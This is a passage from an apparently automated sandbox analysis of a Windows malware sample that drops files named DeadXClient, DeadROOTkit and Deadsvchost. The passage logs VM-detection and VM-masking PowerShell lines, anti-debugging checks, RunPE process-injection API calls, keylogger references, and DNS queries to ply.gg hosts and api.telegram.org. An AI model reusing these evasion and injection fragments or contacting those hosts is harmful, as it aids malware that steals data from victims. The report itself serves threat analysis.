                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                          Source: C:\Windows\System32\spoolsv.exeLast function: Thread delayed
                          Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Deadsvchost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A09BF5C FindFirstFileExW,6_2_000002E86A09BF5C
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC64BF5C FindFirstFileExW,11_2_00000225DC64BF5C
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AEBF5C FindFirstFileExW,12_2_00000202C0AEBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66130BF5C FindFirstFileExW,14_2_000002A66130BF5C
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF21BF5C FindFirstFileExW,16_2_000002BAAF21BF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879CBF5C FindFirstFileExW,17_2_0000026A879CBF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537ABF5C FindFirstFileExW,19_2_00000179537ABF5C
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D56BF5C FindFirstFileExW,20_2_000002295D56BF5C
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadXClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599765Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599640Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599421Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599293Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 599133Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598741Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598568Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeThread delayed: delay time: 598440Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                          Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: VMware SATA CD00
                          Source: svchost.exe, 00000016.00000002.3003322071.000001845BC0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: NECVMWarVMware SATA CD00
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                          Source: DeadXClient.exe, 00000001.00000002.3027772809.000000001B950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpe="%SystemRoot%\system32\mswsock.dll Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
                          Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                          Source: dwm.exe, 00000010.00000002.3015392657.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
                          Source: svchost.exe, 00000019.00000003.1884989548.000001D5593A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                          Source: svchost.exe, 0000002E.00000000.1971368837.000002644A702000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: storahciNECVMWarVMware SATA CD00
                          Source: svchost.exe, 0000002E.00000000.1971007681.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                          Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.25.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                          Source: DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B1C0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2947445090.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763056883.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2944371275.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1779615451.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1828161569.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2938538248.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1830040806.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2938017743.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1834191940.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2955372559.000001845AC3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 0000000E.00000000.1779646224.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                          Source: System.evtx.25.drBinary or memory string: VMCI: Using capabilities (0x1c).
                          Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
                          Source: DeadROOTkit.exe.2.drBinary or memory string: vmware
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: nonicNECVMWarVMware SATA CD00
                          Source: svchost.exe, 00000019.00000000.1856908849.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2952389964.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                          Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.25.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                          Source: lsass.exe, 0000000C.00000000.1766962440.00000202C037F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                          Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.25.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                          Source: svchost.exe, 0000002E.00000000.1971175317.000002644A640000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.ifo
                          Source: svchost.exe, 0000002E.00000000.1971007681.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 00000019.00000002.2953316253.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
                          Source: svchost.exe, 0000000E.00000002.2949507615.000002A66066B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: svchost.exe, 00000024.00000002.2936162051.0000023FD3802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                          Source: lsass.exe, 0000000C.00000002.2952382254.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
                          Source: svchost.exe, 00000019.00000000.1858871917.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
                          Source: Microsoft-Windows-Ntfs%4Operational.evtx.25.drBinary or memory string: VMware
                          Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.25.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                          Source: DeadXClient.exe, 00000001.00000002.2920271280.0000000000AD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
                          Source: dwm.exe, 00000010.00000002.3015392657.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_6-7289
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                          Source: C:\Users\Public\DeadROOTkit.exeCode function: 2_2_00007FFD9B8078C1 CheckRemoteDebuggerPresent,2_2_00007FFD9B8078C1
                          Source: C:\Users\Public\DeadROOTkit.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A0981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000002E86A0981B0
                          Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 3_2_00B019E2 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap,3_2_00B019E2
                          Source: C:\Users\Public\DeadXClient.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Deadsvchost.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A098518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000002E86A098518
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A0981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000002E86A0981B0
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A09B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000002E86A09B62C
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC6481B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000225DC6481B0
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC64B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000225DC64B62C
                          Source: C:\Windows\System32\winlogon.exeCode function: 11_2_00000225DC648518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00000225DC648518
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AEB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000202C0AEB62C
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AE81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000202C0AE81B0
                          Source: C:\Windows\System32\lsass.exeCode function: 12_2_00000202C0AE8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00000202C0AE8518
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A66130B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002A66130B62C
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A661308518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000002A661308518
                          Source: C:\Windows\System32\svchost.exeCode function: 14_2_000002A6613081B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002A6613081B0
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF2181B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000002BAAF2181B0
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF21B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000002BAAF21B62C
                          Source: C:\Windows\System32\dwm.exeCode function: 16_2_000002BAAF218518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000002BAAF218518
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879C8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0000026A879C8518
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879CB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000026A879CB62C
                          Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000026A879C81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000026A879C81B0
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537A81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000179537A81B0
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537AB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000179537AB62C
                          Source: C:\Windows\System32\svchost.exeCode function: 19_2_00000179537A8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00000179537A8518
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D56B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002295D56B62C
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D568518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000002295D568518
                          Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002295D5681B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002295D5681B0
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\System32\svchost.exeDomain query: updates-full.gl.at.ply.gg
                          Source: C:\Windows\System32\svchost.exeDomain query: subscribe-bond.gl.at.ply.gg
                          Source: C:\Windows\System32\svchost.exeDomain query: api.telegram.org
                          .NET source code contains process injector
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                          Source: 3.0.DeadCodeRootKit.exe.b040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                          Source: 3.2.DeadCodeRootKit.exe.b040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                          Source: 4.2.powershell.exe.11113b8b798.11.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                          .NET source code references suspicious native API functions
                          Source: DeadXClient.exe.0.dr, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                          Source: DeadROOTkit.exe.0.dr, XLogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
